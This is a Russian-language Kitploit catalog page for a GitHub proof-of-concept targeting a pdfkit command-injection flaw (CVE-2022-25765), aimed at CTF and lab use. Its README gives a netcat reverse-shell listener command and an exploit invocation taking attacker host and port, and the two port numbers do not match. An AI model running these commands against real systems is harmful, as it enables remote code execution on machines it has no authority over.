Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-25765 — Python proof-of-concept для CVE-2022-25765 — уязвимости внедрения команд в pdfkit, позволяющей удалённое выполнение кода через специально сформированную генерацию PDF. | Kitploit
Инструменты/GitHubGitHub/innocentx0/cve-2022-25765
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubinnocentx0/cve-2022-25765

CVE-2022-25765

Python proof-of-concept для CVE-2022-25765 — уязвимости внедрения команд в pdfkit, позволяющей удалённое выполнение кода через специально сформированную генерацию PDF.

Репозиторий
16 ч 53 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-25765 — pdfkit

PoC для CVE-2022-25765, затрагивающий уязвимые версии pdfkit.

Протестировано с pdfkit 0.8.6.

Требования

  • Python 3.x
  • requests
  • colorama

Установка зависимостей:

root@kitploit:~
pip3 install -r requirements.txt

Или вручную:

root@kitploit:~
pip3 install requests colorama

Использование

root@kitploit:~
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>

Пример: Запустите слушатель

root@kitploit:~
nc -lvnp 4242
root@kitploit:~
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444

Установка

Клонируйте репозиторий:

root@kitploit:~
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765

Установите зависимости:

root@kitploit:~
pip3 install -r requirements.txt

Запустите PoC против вашей лабораторной цели.

Уязвимость

CVE-2022-25765 — это уязвимость внедрения команд в уязвимых версиях pdfkit.

Проблема связана с недостаточной санитизацией пользовательского ввода, передаваемого в процесс генерации PDF.

Примечания

Данный PoC создан в основном для обучения и сред CTF/лабораторий.

Если вы ищете место, где можно его опробовать, — Hack The Box: Машина: Precious.

Отказ от ответственности

Используйте это только против систем, которыми вы владеете или на тестирование которых имеете явное разрешение.

Я не несу ответственности за неправомерное использование или ущерб, причинённый данным проектом.


INNOCENTx0

Скачать инструмент